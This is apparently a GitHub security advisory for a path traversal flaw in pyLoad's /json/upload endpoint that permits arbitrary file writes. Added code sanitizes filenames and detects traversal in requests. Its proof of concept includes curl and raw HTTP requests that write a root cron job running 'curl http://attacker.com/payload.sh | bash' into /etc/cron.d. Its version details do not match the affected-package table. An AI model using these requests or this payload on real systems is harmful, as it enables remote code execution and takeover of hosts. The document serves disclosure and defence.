
GHSA-xqpg-92fq-grfg

GitHub Security Advisory

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

GitHub reviewed · Severity: HIGH · Has CVE

Advisory Details

## Summary
An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of `pyLoad`. By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory and **write arbitrary files to any location** on the system that is writable by the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**

---

### Vulnerable Code

File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)

```python
import os

from flask import request

# `api` and `json_blueprint` are module-level objects defined in
# src/pyload/webui/app/blueprints/json_blueprint.py.


@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        # file.filename comes straight from the client's Content-Disposition
        # header and is joined unchanged, so "../" components leave dir_path.
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)
```
**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.
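The following is an added example, not pyLoad's code or the project's fix: it puts the advisory's path construction beside a hardened form. `sanitize_filename()` reduces the client-supplied name to a single safe path component, and `safe_upload_path()` additionally verifies that the resolved destination still lies under the storage folder, which is the check the original handler lacks. `storage_folder` is assumed to stand in for the value returned by `api.get_config_value("general", "storage_folder")`.

```python
import os
import posixpath
import re

# Added example (not pyLoad's code): a hardened replacement for the line
#   file_path = os.path.join(dir_path, "tmp_" + file.filename)
# `storage_folder` is assumed to be the configured "storage_folder" value.

_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]+")


def sanitize_filename(filename: str) -> str:
    """Reduce a client-controlled filename to one safe path component.

    Both "/" and "\\" count as separators (Windows clients send the latter),
    everything but the last component is discarded, and the remainder is
    limited to a conservative character set. Names that collapse to nothing,
    "." or ".." are rejected instead of being silently renamed.
    """
    last = posixpath.basename(filename.replace("\\", "/"))
    name = _UNSAFE_CHARS.sub("_", last).strip("._")
    if not name:
        raise ValueError(f"unusable upload filename: {filename!r}")
    return name


def vulnerable_upload_path(storage_folder: str, filename: str) -> str:
    """The advisory's construction, kept only for comparison: no validation."""
    return os.path.join(storage_folder, "tmp_" + filename)


def safe_upload_path(storage_folder: str, filename: str) -> str:
    """Build the destination path and prove it stays inside storage_folder."""
    base = os.path.realpath(storage_folder)
    target = os.path.realpath(
        os.path.join(base, "tmp_" + sanitize_filename(filename))
    )
    # Defence in depth: even with sanitize_filename() in place, refuse any
    # result that does not resolve underneath the storage folder.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("destination escapes storage folder")
    return target


def escapes_storage(storage_folder: str, file_path: str) -> bool:
    """True if file_path resolves outside storage_folder.

    This is the containment test the original handler never performs;
    symlinks are resolved on both sides so the comparison is meaningful.
    """
    base = os.path.realpath(storage_folder)
    return os.path.commonpath([base, os.path.realpath(file_path)]) != base


if __name__ == "__main__":
    base = "/srv/pyload/storage"          # constructed sample storage folder
    evil = "../../../../etc/cron.d/pyload_backdoor"
    print("vulnerable:", vulnerable_upload_path(base, evil),
          "escapes" if escapes_storage(base, vulnerable_upload_path(base, evil)) else "contained")
    print("hardened:  ", safe_upload_path(base, evil))
```

Two separate controls are intentional: sanitizing the name fixes the bug, while the `commonpath` check catches any future code path that builds a destination from client input without going through `sanitize_filename()`.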

### Proof of Concept

1. **Clone and install pyLoad from source** (the PyPI package is `pyload-ng`):

```bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
```

2. **Or install via pip (PyPi) in virtualenv:**

```bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
```

3. **Log in and obtain a session token**

```bash
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
```

4. **Create the malicious cron payload**

```bash
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
```

5. **Upload the file with a path traversal filename**

```bash
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
```

6. On the next cron tick, a reverse shell or payload will be triggered.

### BurpSuite HTTP Request

```http
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```
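From the defender's side, the request above has a signature that is easy to check before the handler ever sees it: an upload whose `Content-Disposition` filename is not a bare file name. The following is an added example, not part of the advisory or of pyLoad, of such a check, usable in a request-log review or as a pre-filter in front of `/json/upload`. It goes beyond the page's single case by also handling percent-encoded and double-encoded separators, Windows-style backslashes and the RFC 5987 `filename*=` form. `SAMPLE_REQUEST` and `BENIGN_REQUEST` are constructed inline, modelled on the Burp request above with the file body replaced by a placeholder.

```python
import re
from urllib.parse import unquote

# Added example (not pyLoad's code): flag multipart upload filenames that
# contain path separators or traversal sequences. The sample requests below
# are constructed for this example.

_DISPOSITION = re.compile(
    rb'Content-Disposition:[^\r\n]*?filename(\*)?=("?)([^"\r\n;]*)\2',
    re.IGNORECASE,
)

_BOUNDARY = b"------------------------d74496d66958873e"

SAMPLE_REQUEST = (
    b"POST /json/upload HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8000\r\n"
    b"Cookie: session=SESSION_ID_HERE\r\n"
    b"Content-Type: multipart/form-data; boundary=" + _BOUNDARY + b"\r\n"
    b"\r\n"
    b"--" + _BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; '
    b'filename="../../../../etc/cron.d/pyload_backdoor"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"(file body omitted)\r\n"
    b"--" + _BOUNDARY + b"--\r\n"
)

BENIGN_REQUEST = (
    b"POST /json/upload HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8000\r\n"
    b"Content-Type: multipart/form-data; boundary=" + _BOUNDARY + b"\r\n"
    b"\r\n"
    b"--" + _BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="links.txt"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"(file body omitted)\r\n"
    b"--" + _BOUNDARY + b"--\r\n"
)


def is_traversal_filename(name: str) -> bool:
    """True if an upload filename is anything other than a bare file name."""
    decoded = unquote(unquote(name))  # undo single and double percent-encoding
    if "\x00" in decoded:
        return True
    if re.match(r"^(?:[A-Za-z]:|[\\/])", decoded):  # absolute POSIX/Windows path
        return True
    parts = re.split(r"[\\/]", decoded)
    return len(parts) > 1 or decoded in ("", ".", "..")


def find_suspicious_uploads(raw_request: bytes) -> list[str]:
    """Return every multipart filename in raw_request that fails the check,
    exactly as the client sent it (still encoded, if it was)."""
    hits = []
    for extended, _quote, value in _DISPOSITION.findall(raw_request):
        name = value.decode("latin-1")
        if extended:  # RFC 5987 form: filename*=charset'lang'percent-encoded
            name = name.split("'", 2)[-1]
        if is_traversal_filename(name):
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("sample request:", find_suspicious_uploads(SAMPLE_REQUEST))
    print("benign request:", find_suspicious_uploads(BENIGN_REQUEST))
```

Because pyLoad itself prefixes the name with `tmp_` and joins it to the storage folder, any separator at all in the filename is out of policy for this endpoint, which is why the check flags separators rather than trying to enumerate traversal patterns.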

## Affected Packages

| Ecosystem | Package | Affected versions | Fixed in |
|---|---|---|---|
| PyPI | pyload-ng | 0.5.0b3.dev89 | 0.5.0b3.dev90 |

## Key Information

* **GHSA ID:** GHSA-xqpg-92fq-grfg
* **Published:** July 21, 2025 9:16 PM
* **Last Modified:** July 23, 2025 1:37 PM
* **CVSS Score:** 7.5 / 10
* **Primary Ecosystem:** PyPI
* **Primary Package:** pyload-ng
* **GitHub Reviewed:** Yes

Data from GitHub Advisory Database.